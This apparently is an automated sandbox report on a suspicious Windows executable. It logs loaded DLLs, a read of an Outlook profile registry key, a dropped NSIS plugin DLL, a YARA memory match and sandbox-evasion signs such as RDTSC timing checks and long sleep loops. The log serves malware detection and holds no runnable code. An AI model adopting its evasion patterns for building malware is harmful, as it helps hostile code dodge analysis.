            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: xXUnP7uCBJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2212629078.0000000003E3C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_701A1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701A1B5F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile created: C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeAPI/Special instruction interceptor: Address: 402FDF3
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeAPI/Special instruction interceptor: Address: 248FDF3
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeRDTSC instruction interceptor: First address: 3FF4E1A second address: 3FF4E1A instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F44A4C23A98h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeRDTSC instruction interceptor: First address: 2454E1A second address: 2454E1A instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F44A44F8418h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeMemory allocated: 130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeMemory allocated: 366D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeMemory allocated: 386D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599870Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599750Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599640Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599196Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597317Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596856Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596749Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596618Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596465Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596249Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596139Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595374Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeWindow / User API: threadDelayed 2756Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeWindow / User API: threadDelayed 7092Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 4448Thread sleep count: 2756 > 30Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599870s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 4448Thread sleep count: 7092 > 30Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599196s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597317s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596856s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596618s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596465s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596249s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596139s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exe TID: 1164Thread sleep time: -594281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599870Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599750Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599640Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599196Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeThread delayed: delay time: 598328Jump to behavior
